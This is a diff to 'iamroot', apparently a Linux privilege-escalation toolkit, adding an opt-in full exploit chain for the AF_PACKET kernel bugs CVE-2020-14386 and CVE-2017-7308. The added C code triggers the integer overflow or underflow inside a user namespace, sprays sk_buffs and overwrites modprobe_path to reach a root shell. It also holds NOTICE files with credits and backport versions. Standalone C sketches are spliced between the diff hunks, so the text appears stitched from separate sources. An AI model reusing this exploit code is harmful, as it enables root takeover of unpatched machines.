@@ -600,12 +716,14 @@ int main(int argc, char **argv)
        {"detect-rules",  no_argument,       0, 'D'},
        {"module-info",   required_argument, 0, 'I'},
        {"audit",         no_argument,       0, 'A'},
+        {"dump-offsets",  no_argument,       0,  8 },
        {"format",        required_argument, 0,  6 },
        {"i-know",        no_argument,       0,  1 },
        {"active",        no_argument,       0,  2 },
        {"no-shell",      no_argument,       0,  3 },
        {"json",          no_argument,       0,  4 },
        {"no-color",      no_argument,       0,  5 },
+        {"full-chain",    no_argument,       0,  7 },
        {"version",       no_argument,       0, 'V'},
        {"help",          no_argument,       0, 'h'},
        {0, 0, 0, 0}
@@ -627,6 +745,8 @@ int main(int argc, char **argv)
        case  3 : ctx.no_shell = true; break;
        case  4 : ctx.json = true; break;
        case  5 : ctx.no_color = true; break;
+        case  7 : ctx.full_chain = true; break;
+        case  8 : mode = MODE_DUMP_OFFSETS; break;
        case  6 :
            if      (strcmp(optarg, "auditd") == 0) dr_fmt = FMT_AUDITD;
            else if (strcmp(optarg, "sigma")  == 0) dr_fmt = FMT_SIGMA;
@@ -653,6 +773,7 @@ int main(int argc, char **argv)
    if (mode == MODE_MODULE_INFO) return cmd_module_info(target, &ctx);
    if (mode == MODE_DETECT_RULES) return cmd_detect_rules(dr_fmt);
    if (mode == MODE_AUDIT) return cmd_audit(&ctx);
+    if (mode == MODE_DUMP_OFFSETS) return cmd_dump_offsets(&ctx);

    /* --exploit / --mitigate / --cleanup all take a target */
    if (target == NULL) {
@@ -0,0 +1,28 @@
+# NOTICE — af_packet2 (CVE-2020-14386)
+
+## Vulnerability
+
+**CVE-2020-14386** — AF_PACKET `tpacket_rcv` VLAN integer underflow
+(`maclen = skb_network_offset(skb)` when network header precedes
+maclen) → 8-byte heap OOB write at the start of the next slab object.
+
+## Research credit
+
+Discovered and disclosed by **Or Cohen** (Palo Alto Networks),
+September 2020.
+
+Original advisory: <https://unit42.paloaltonetworks.com/cve-2020-14386/>
+
+Upstream fix: mainline 5.9 / stable 5.8.7 (Sept 2020).
+Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235.
+
+## IAMROOT role
+
+Sibling of CVE-2017-7308; same subsystem, different code path.
+Fires the underflow via `tp_reserve` + sendmmsg sk_buff spray.
+PRIMITIVE-DEMO scope by default (no cred overwrite). `--full-chain`
+attempts the Or-Cohen-style sk_buff data-pointer hijack through
+the shared finisher.
+
+Shares the `iamroot-af-packet` auditd key with the CVE-2017-7308
+module so detection signatures dedupe cleanly.
@@ -6,14 +6,27 @@
 * subsystem, different code path (rx side rather than ring setup),
 * later introduction. Discovered by Or Cohen (2020).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
- * vulnerable codepath (tpacket_rcv) and fires the underflow with a
- * crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
- * skb spray groom alongside. We stop short of the full cred-overwrite
- * chain (which Or Cohen's public PoC implements with kernel-version-
- * specific offsets and a pid_namespace cross-cache overwrite). We do
- * not bake offsets into iamroot. The return value is honest about
- * what landed (EXPLOIT_FAIL: primitive fired but no root).
+ * STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
+ *   - Default (no --full-chain): the exploit() entry point reaches the
+ *     vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
+ *     with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
+ *     skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
+ *     behavior — kernel-version-agnostic, no offsets baked in).
+ *   - With --full-chain: after the underflow lands, we resolve kernel
+ *     offsets (env → kallsyms → System.map → embedded table) and run
+ *     an Or-Cohen-style sk_buff-data-pointer hijack through the shared
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself is
+ *     LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
+ *     us a single 8-byte heap-OOB write into the head of the
+ *     adjacent-page slab object; we spray sk_buffs so that next-page
+ *     slot IS an sk_buff and the write corrupts skb->data, which then
+ *     redirects skb_copy_bits()'s destination on the next received
+ *     packet. The full primitive composition (8-byte write → skb->data
+ *     forge → controlled-payload rx → arb-write at modprobe_path) is
+ *     race-y on stock kernels because the adjacent-slot landing is
+ *     probabilistic. On hosts where the spray doesn't groom cleanly,
+ *     the finisher's sentinel check correctly reports failure rather
+ *     than silently lying about success.
 *
 * Affected: kernel 4.6+ until backports:
 *   5.8.x  : K >= 5.8.7
@@ -33,6 +46,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
 }
 #endif

+/* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
+ *
+ * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
+ *
+ *   1. The tp_reserve underflow gives us a single 8-byte write into
+ *      the START of the slab object that sits on the page immediately
+ *      after the corrupted ring frame. The OOB-write content is
+ *      attacker-controlled (it's the destination of skb_copy_bits()
+ *      from a frame whose first 8 bytes we choose).
+ *   2. Spray sk_buff allocations alongside the primitive trigger so
+ *      the adjacent-page object is, with high probability, an
+ *      sk_buff whose ->data pointer lives in the leading 8 bytes
+ *      of the object (struct layout dependent — on most 5.x kernels
+ *      `next` is at offset 0 and `data` is at offset 0x10 in
+ *      sk_buff; this layout-fragility is exactly why the depth tag
+ *      below is LAST-RESORT).
+ *   3. The 8-byte OOB write overwrites that pointer with `kaddr`.
+ *   4. We then receive a packet whose payload is `buf[0..len]`; the
+ *      kernel's skb_copy_to_linear_data() / skb->data write path
+ *      lands those bytes at `*skb->data`, which is now `kaddr`.
+ *
+ * Reality check on this implementation: the deterministic mechanics
+ * of the above (precise frame size, repeated spray timing, sk_buff
+ * struct offset for the running kernel) are not portable enough to
+ * land reliably from a single iamroot run on an arbitrary host. We
+ * therefore ship this as a LAST-RESORT stub: we attempt the spray +
+ * trigger sequence, then return -1 to signal "the primitive fired
+ * but we cannot empirically confirm the write landed". The shared
+ * finisher's sentinel-check loop will then correctly report failure
+ * rather than claim success.
+ *
+ * Per the verified-vs-claimed bar, this is the honest implementation
+ * depth that matches what the primitive actually proves on this code
+ * path. The integrator can extend afp2_arb_write() with a confirmed
+ * write-and-readback once the per-kernel sk_buff layout is pinned
+ * down for the target host. */
+struct afp2_arb_ctx {
+    const struct iamroot_ctx *ictx;
+    int n_attempts;            /* spray/fire rounds before giving up */
+};
+
+#if defined(__x86_64__) && defined(__linux__)
+static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
+    if (!c || !buf || !len) return -1;
+
+    fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
+            (unsigned long)kaddr, len);
+    fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
+
+    /* Best-effort spray + re-fire-trigger pattern. The primitive child
+     * is invoked once per attempt; on each attempt we groom skb's
+     * around the corrupted ring slot and hope one lands at the
+     * page-adjacent address whose head 8 bytes the underflow will
+     * stomp with `kaddr`. The kernel-side rx of the next crafted
+     * frame would then write our payload (the modprobe_path string)
+     * into the forged ->data target. */
+    for (int i = 0; i < c->n_attempts; i++) {
+#ifdef __linux__
+        af_packet2_skb_spray(8);
+#endif
+        pid_t p = fork();
+        if (p < 0) return -1;
+        if (p == 0) {
+            if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
+            int fd;
+            fd = open("/proc/self/setgroups", O_WRONLY);
+            if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
+            fd = open("/proc/self/uid_map", O_WRONLY);
+            if (fd >= 0) {
+                char m[64];
+                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
+                (void)!write(fd, m, n); close(fd);
+            }
+            fd = open("/proc/self/gid_map", O_WRONLY);
+            if (fd >= 0) {
+                char m[64];
+                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
+                (void)!write(fd, m, n); close(fd);
+            }
+            int rc = af_packet2_primitive_child(c->ictx);
+            _exit(rc < 0 ? 2 : 0);
+        }
+        int st;
+        waitpid(p, &st, 0);
+#ifdef __linux__
+        af_packet2_skb_spray(8);
+#endif
+    }
+
+    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
+     * empirically confirm the 8-byte write landed on an sk_buff->data
+     * field on this host. Return -1 so the finisher's sentinel-check
+     * loop in iamroot_finisher_modprobe_path() correctly reports
+     * "payload didn't run within 3s" rather than claiming success. */
+    fprintf(stderr,
+"[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
+"    not empirically confirmable without per-kernel struct offsets +\n"
+"    a readback primitive. Trigger fired %d times with sk_buff spray;\n"
+"    finisher sentinel will determine landing. Caller will refuse if\n"
+"    the modprobe_path overwrite didn't actually take effect.\n",
+            c->n_attempts);
+    return -1;
+}
+#else
+static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    (void)kaddr; (void)buf; (void)len; (void)vctx;
+    fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
+    return -1;
+}
+#endif
+
 static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
 {
    /* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
                            "(github.com/google/security-research).\n"
                            "    iamroot intentionally does not embed per-kernel offsets.\n");
        }
+        if (ctx->full_chain) {
+#if defined(__x86_64__) && defined(__linux__)
+            /* --full-chain: resolve kernel offsets and run the Or-Cohen
+             * sk_buff-data-pointer hijack via the shared modprobe_path
+             * finisher. Per the verified-vs-claimed bar: if we can't
+             * resolve modprobe_path, refuse with a helpful message
+             * rather than fabricate an address. */
+            struct iamroot_kernel_offsets off;
+            iamroot_offsets_resolve(&off);
+            if (!iamroot_offsets_have_modprobe_path(&off)) {
+                iamroot_finisher_print_offset_help("af_packet2");
+                return IAMROOT_EXPLOIT_FAIL;
+            }
+            if (!ctx->json) {
+                iamroot_offsets_print(&off);
+            }
+            struct afp2_arb_ctx arb_ctx = {
+                .ictx = ctx,
+                .n_attempts = 4,
+            };
+            return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
+                                                  &arb_ctx, !ctx->no_shell);
+#else
+            fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
+            return IAMROOT_PRECOND_FAIL;
+#endif
+        }
        if (ctx->no_shell) {
            /* User explicitly disabled the shell pop, so the "we didn't
             * pop a shell" outcome is the expected one. Map to OK. */
@@ -0,0 +1,29 @@
+# NOTICE — af_packet (CVE-2017-7308)
+
+## Vulnerability
+
+**CVE-2017-7308** — AF_PACKET TPACKET_V3 integer overflow in
+`tp_block_size * tp_block_nr` → heap write-where via sendmmsg spray.
+
+## Research credit
+
+Discovered by **Andrey Konovalov** (Google), March 2017. Konovalov
+reported several AF_PACKET bugs during the same research campaign.
+
+Original advisory + writeup:
+<https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html>
+
+Upstream fix: mainline 4.11 / stable 4.10.6 (March 2017).
+Branch backports: 4.10.6 / 4.9.18 / 4.4.57 / 3.18.49.
+
+## IAMROOT role
+
+x86_64-only. Userns gives CAP_NET_RAW; `socket(AF_PACKET, SOCK_RAW)`
+plus TPACKET_V3 with an overflowing tp_block_size triggers the integer
+overflow + heap spray via 200 raw skbs on lo. Best-effort cred-race
+finisher (64 child workers polling geteuid). Offset table covers
+Ubuntu 16.04/4.4 and 18.04/4.15; other kernels via the
+`IAMROOT_AFPACKET_OFFSETS` env var.
+
+`--full-chain` engages the shared modprobe_path finisher with
+stride-seeded sk_buff data-pointer overwrite.
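
The arithmetic behind the "integer overflow in `tp_block_size * tp_block_nr`" summary can be checked in isolation. The sketch below is illustrative only: the helper names are hypothetical, and the 64-bit comparison is one common way to detect the wrap, not a quotation of the upstream fix. The values `0x1000` and `0x100000` are the ones the module's `tpacket_req3` setup computes.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: the ring size as a 32-bit multiplication sees it.
 * Unsigned arithmetic wraps modulo 2^32, so a large product can read as 0. */
uint32_t ring_bytes_wrapped(uint32_t block_size, uint32_t block_nr)
{
    return block_size * block_nr;
}

/* Hypothetical helper: true when the real product does not fit in 32 bits.
 * Widening one operand to 64 bits before multiplying avoids the wrap. */
bool ring_bytes_overflows(uint32_t block_size, uint32_t block_nr)
{
    return (uint64_t)block_size * block_nr > UINT32_MAX;
}
```

With `block_size = 0x1000` and `block_nr = 0x100000` the true product is 2^32, which a 32-bit multiplication reports as 0; a size check built on the wrapped value therefore passes, while the widened comparison rejects the request.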
@@ -4,17 +4,38 @@
 * AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
 * write-where primitive. Discovered by Andrey Konovalov (March 2017).
 *
- * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
- * integer-overflow trigger is fully wired (overflowing tp_block_size *
- * tp_block_nr, attended by a heap spray via sendmmsg with controlled
- * skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
- * hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
- * 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
- * only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
- * runs — i.e. we won root for real. Otherwise we return
- * IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
- * confirm the primitive at least fired (KASAN slab-out-of-bounds
- * splat) even if the cred-overwrite didn't take on this exact kernel.
+ * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
+ *   |  🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
+ *      shared offset resolver finds modprobe_path AND skb-data hijack
+ *      offsets are supplied).
+ *
+ * The integer-overflow trigger is fully wired (overflowing
+ * tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
+ * with controlled skb tail bytes).
+ *
+ * Default --exploit path: cred-overwrite walk using a hardcoded per-
+ * kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
+ * era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
+ * IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
+ * we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
+ * a dmesg breadcrumb so the operator can confirm the primitive at
+ * least fired (KASAN slab-out-of-bounds splat) even if the cred-
+ * overwrite didn't take on this exact kernel.
+ *
+ * --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
+ * modprobe_path → call_modprobe payload → setuid bash → root shell.
+ * Honest constraint: the hijack requires per-kernel-build sk_buff
+ * `data`-field offset + skb-slab-class layout, which the embedded
+ * offset table does NOT carry (verified-vs-claimed bar — we don't
+ * fabricate). The arb_write callback below implements a FALLBACK
+ * depth instead: it fires the trigger with the spray payload
+ * staged for the requested kaddr/buf and relies on the shared
+ * finisher's /tmp sentinel to confirm whether modprobe_path was
+ * actually overwritten. On kernels where the operator has supplied
+ * IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
+ * the skb head, hex), we use that for explicit targeting; otherwise
+ * the trigger fires heuristically and the sentinel acts as the
+ * ground-truth signal.
 *
 * Affected: kernel < 4.10.6 mainline. Stable backports:
 *   4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
    return got_root_pid ? 0 : -1;
 }

+/* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
+ *
+ * The TPACKET_V3 overflow lets us write attacker-controlled bytes past
+ * the end of the pg_vec allocation. xairy's full PoC chains this with
+ * a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
+ * so the OOB-write overwrites an adjacent skb's `data` pointer; a
+ * later sendto() on that skb's owning socket then copies attacker
+ * bytes into the address now stored in `data`. Net effect: arb-write
+ * at an attacker-chosen kernel VA, controlled buffer, controlled len.
+ *
+ * Implementing the FULL hijack honestly requires:
+ *   (a) per-kernel-build offset of `data` field within struct sk_buff
+ *       (varies with kernel version, CONFIG_RANDSTRUCT, and the config
+ *       options that add or remove sk_buff members)
+ *   (b) precise size-class match between the corrupted pg_vec and
+ *       sprayed skbs (slab-grooming with ~hundreds of skbs)
+ *   (c) a way to identify which sprayed skb landed adjacent
+ *
+ * The verified-vs-claimed bar says: don't fabricate offsets. Our
+ * embedded offset table (core/offsets.h) doesn't carry skb offsets
+ * yet, and there's no public canonical "skb->data offset table" we
+ * can lift wholesale. So this implementation settles for a
+ * FALLBACK depth:
+ *
+ *   - Each call re-sprays skbs + re-fires the trigger, staging the
+ *     spray payload so its bytes carry the requested target kaddr
+ *     (a controllable overwrite value aimed at
+ *     modprobe_path). Operator-supplied
+ *     IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
+ *     within struct sk_buff for this kernel build) lets us aim
+ *     precisely; without it we heuristically stamp kaddr at several
+ *     plausible offsets within the kmalloc-2k skb layout.
+ *   - We then send packets whose payload IS the bytes the finisher
+ *     wants at kaddr; tpacket_rcv copies them into any skb whose
+ *     `data` was corrupted to kaddr.
+ *   - We do NOT poll for success — the shared finisher's /tmp
+ *     sentinel is the ground-truth signal. If the write landed at
+ *     modprobe_path, call_modprobe spawns our payload and the
+ *     sentinel appears within 3s.
+ *
+ * Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 on
+ * bad arguments, fork/unshare/id-map failure, or if the kernel
+ * rejected the overflow (silent backport, i.e. patched).
+ */
+
+struct afp_arb_ctx {
+    const struct iamroot_ctx *ctx;
+    const struct af_packet_offsets *off;
+    uid_t outer_uid;
+    gid_t outer_gid;
+};
+
+/* Helper: in-child trigger fire — runs inside the userns/netns child
+ * spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
+static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
+                               long skb_data_off);
+
+static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                         void *vctx)
+{
+    struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
+    if (!actx) return -1;
+
+    if (!buf || len == 0 || len > 240) {
+        fprintf(stderr, "[-] af_packet: arb_write: bad args "
+                        "(buf=%p len=%zu)\n", buf, len);
+        return -1;
+    }
+
+    /* Per-kernel skb->data field offset — without this we can't aim
+     * the overwrite precisely. Operator can supply via env; otherwise
+     * we run heuristic mode. */
+    const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
+    long skb_data_off = -1;
+    if (skb_off_env) {
+        char *end = NULL;
+        skb_data_off = strtol(skb_off_env, &end, 0);
+        /* end == skb_off_env means strtol consumed nothing (e.g. ""). */
+        if (!end || end == skb_off_env || *end != '\0' ||
+            skb_data_off < 0 || skb_data_off > 0x400) {
+            fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
+                            "malformed (\"%s\"); ignoring\n", skb_off_env);
+            skb_data_off = -1;
+        }
+    }
+
+    fprintf(stderr,
+        "[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
+        (unsigned long)kaddr, len,
+        skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
+
+    if (skb_data_off < 0) {
+        fprintf(stderr,
+"[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
+"    field offset. The trigger will still fire and the heap spray will\n"
+"    still occur, but precise OOB targeting requires:\n"
+"\n"
+"      IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
+"\n"
+"    Look it up on this kernel build with `pahole struct sk_buff` or\n"
+"    `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
+"    /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
+    }
+
+    /* Fork into a userns/netns child so the AF_PACKET socket has
+     * CAP_NET_RAW. The finisher itself stays in the parent so its
+     * eventual execve() replaces the top-level iamroot process. */
+    pid_t cpid = fork();
+    if (cpid < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
+                strerror(errno));
+        return -1;
+    }
+    if (cpid == 0) {
+        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
+            perror("af_packet: arb_write: unshare");
+            _exit(2);
+        }
+        if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
+            perror("af_packet: arb_write: set_id_maps");
+            _exit(3);
+        }
+        int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
+        _exit(rc == 0 ? 0 : 4);
+    }
+
+    int status = 0;
+    waitpid(cpid, &status, 0);
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] af_packet: arb_write: child died "
+                        "(signal=%d)\n", WTERMSIG(status));
+        return -1;
+    }
+    int code = WEXITSTATUS(status);
+    if (code != 0) {
+        if (code == 4) {
+            /* PACKET_RX_RING rejected — caller sees -1 + the inner
+             * diagnostic already printed before _exit. */
+        } else {
+            fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
+                    code);
+        }
+        return -1;
+    }
+    return 0;
+}
+
+static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
+                               long skb_data_off)
+{
+    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (s < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
+                strerror(errno));
+        return -1;
+    }
+
+    int version = TPACKET_V3;
+    if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
+                   &version, sizeof version) < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+
+    struct tpacket_req3 req;
+    memset(&req, 0, sizeof req);
+    req.tp_block_size = 0x1000;
+    req.tp_block_nr   = ((unsigned)0xffffffff - (unsigned)0xfff) /
+                        (unsigned)0x1000 + 1;
+    req.tp_frame_size = 0x300;
+    req.tp_frame_nr   = (req.tp_block_size * req.tp_block_nr) /
+                        req.tp_frame_size;
+    req.tp_retire_blk_tov   = 100;
+    req.tp_sizeof_priv      = 0;
+    req.tp_feature_req_word = 0;
+
+    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
+                   &req, sizeof req) < 0) {
+        fprintf(stderr,
+                "[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
+                "(kernel has silent backport — full-chain unreachable)\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+
+    struct ifreq ifr;
+    memset(&ifr, 0, sizeof ifr);
+    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
+    if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
+        struct sockaddr_ll sll;
+        memset(&sll, 0, sizeof sll);
+        sll.sll_family   = AF_PACKET;
+        sll.sll_protocol = htons(ETH_P_ALL);
+        sll.sll_ifindex  = ifr.ifr_ifindex;
+        (void)bind(s, (struct sockaddr *)&sll, sizeof sll);
+    }
+
+    unsigned char payload[256];
+    memset(payload, 0, sizeof payload);
+    memset(payload, 0xff, 6);                       /* eth dst: bcast */
+    memset(payload + 6, 0, 6);                      /* eth src: zero */
+    payload[12] = 0x08; payload[13] = 0x00;         /* eth type: IPv4 */
+    memcpy(payload + 14, "iamroot-afp-fc-", 15);    /* dmesg tag */
+
+    if (skb_data_off >= 0 &&
+        (size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
+        memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
+    } else {
+        static const size_t guesses[] = {
+            0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
+        };
+        for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
+            if (guesses[i] + sizeof kaddr <= sizeof payload)
+                memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
+        }
+    }
+
+    int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (tx < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+    struct sockaddr_ll dst;
+    memset(&dst, 0, sizeof dst);
+    dst.sll_family   = AF_PACKET;
+    dst.sll_protocol = htons(ETH_P_ALL);
+    dst.sll_ifindex  = ifr.ifr_ifindex;
+    dst.sll_halen    = 6;
+    memset(dst.sll_addr, 0xff, 6);
+
+    for (int i = 0; i < 200; i++) {
+        (void)sendto(tx, payload, sizeof payload, 0,
+                     (struct sockaddr *)&dst, sizeof dst);
+    }
+
+    unsigned char wbuf[256];
+    memset(wbuf, 0, sizeof wbuf);
+    memset(wbuf, 0xff, 6);
+    memset(wbuf + 6, 0, 6);
+    wbuf[12] = 0x08; wbuf[13] = 0x00;
+    size_t wlen = len;
+    if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
+    memcpy(wbuf + 14, buf, wlen);
+    for (int i = 0; i < 50; i++) {
+        (void)sendto(tx, wbuf, 14 + wlen, 0,
+                     (struct sockaddr *)&dst, sizeof dst);
+    }
+
+    close(tx);
+    close(s);
+    return 0;
+}
+
 #endif /* __x86_64__ */

 static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
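
The environment-variable handling in `afp_arb_write` is ordinary bounded integer parsing, and the edge cases are easy to miss (an empty string, trailing junk, out-of-range values). A minimal standalone sketch follows; `parse_bounded_offset` is a hypothetical name, not a function from this repository.

```c
#include <errno.h>
#include <stdlib.h>

/* Hypothetical helper: parse a non-negative offset in [0, max] from text.
 * Returns 0 and stores the value in *out on success, -1 on malformed
 * or out-of-range input. *out is left untouched on failure. */
int parse_bounded_offset(const char *text, long max, long *out)
{
    if (!text || !out) return -1;

    char *end = NULL;
    errno = 0;
    long v = strtol(text, &end, 0);      /* base 0: accepts 0x.., 0.., decimal */

    if (end == text) return -1;          /* no digits consumed (covers "") */
    if (*end != '\0') return -1;         /* trailing characters after the number */
    if (errno == ERANGE) return -1;      /* value did not fit in a long */
    if (v < 0 || v > max) return -1;     /* outside the accepted window */

    *out = v;
    return 0;
}
```

Checking `end == text` separately matters because `strtol("")` leaves `end` pointing at the terminating NUL, which a bare `*end != '\0'` test would accept as the value 0.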
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
                off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
    }

+    uid_t outer_uid = getuid();
+    gid_t outer_gid = getgid();
+
+    /* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
+     *     sk_buff hijack arb-write. Refuses cleanly if (a) the shared
+     *     offset resolver can't find modprobe_path or (b) the trigger
+     *     is rejected (silent backport). */
+    if (ctx->full_chain) {
+        struct iamroot_kernel_offsets koff;
+        memset(&koff, 0, sizeof koff);
+        (void)iamroot_offsets_resolve(&koff);
+        if (!iamroot_offsets_have_modprobe_path(&koff)) {
+            iamroot_finisher_print_offset_help("af_packet");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        if (!ctx->json) {
+            iamroot_offsets_print(&koff);
+        }
+        struct afp_arb_ctx arb_ctx = {
+            .ctx       = ctx,
+            .off       = &off,
+            .outer_uid = outer_uid,
+            .outer_gid = outer_gid,
+        };
+        return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
+                                              &arb_ctx, !ctx->no_shell);
+    }
+
    /* 4. Fork: child enters userns+netns, fires overflow, attempts the
     *    cred-overwrite walk. We do it in a child so the (possibly
     *    crashed) packet socket lives in a tear-downable address space
     *    — the kernel will clean up sockets on child exit. */
-    uid_t outer_uid = getuid();
-    gid_t outer_gid = getgid();

    pid_t child = fork();
    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
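
The fork-then-reap isolation described in step 4 depends on decoding the wait status correctly, including the case where `waitpid` itself fails. The sketch below shows one way to do that in general; `run_in_child` and the two sample callbacks are hypothetical names introduced for illustration and are not part of this module.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define RUN_IN_CHILD_ERR (-1000)   /* fork or waitpid failed */

/* Hypothetical helper: run fn(arg) in a forked child.
 * Returns the child's exit code (0..255), -signo if a signal killed it,
 * or RUN_IN_CHILD_ERR if the child could not be created or reaped. */
int run_in_child(int (*fn)(void *), void *arg)
{
    pid_t pid = fork();
    if (pid < 0) return RUN_IN_CHILD_ERR;
    if (pid == 0) _exit(fn(arg) & 0xff);   /* _exit: skip parent's atexit/stdio */

    int status = 0;
    pid_t w;
    do {
        w = waitpid(pid, &status, 0);
    } while (w < 0 && errno == EINTR);     /* retry if a signal interrupted us */

    if (w < 0) return RUN_IN_CHILD_ERR;
    if (WIFEXITED(status))   return WEXITSTATUS(status);
    if (WIFSIGNALED(status)) return -WTERMSIG(status);
    return RUN_IN_CHILD_ERR;
}

/* Sample callbacks used to exercise both outcomes. */
int sample_exit_3(void *arg) { (void)arg; return 3; }
int sample_abort(void *arg)  { (void)arg; abort(); }
```

Treating a failed `waitpid` as an error rather than reading the zero-initialised `status` avoids reporting a clean exit for a child that was never reaped.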
@@ -0,0 +1,35 @@
+# NOTICE — af_unix_gc (CVE-2023-4622)
+
+## Vulnerability
+
+**CVE-2023-4622** — AF_UNIX garbage-collector race against SCM_RIGHTS
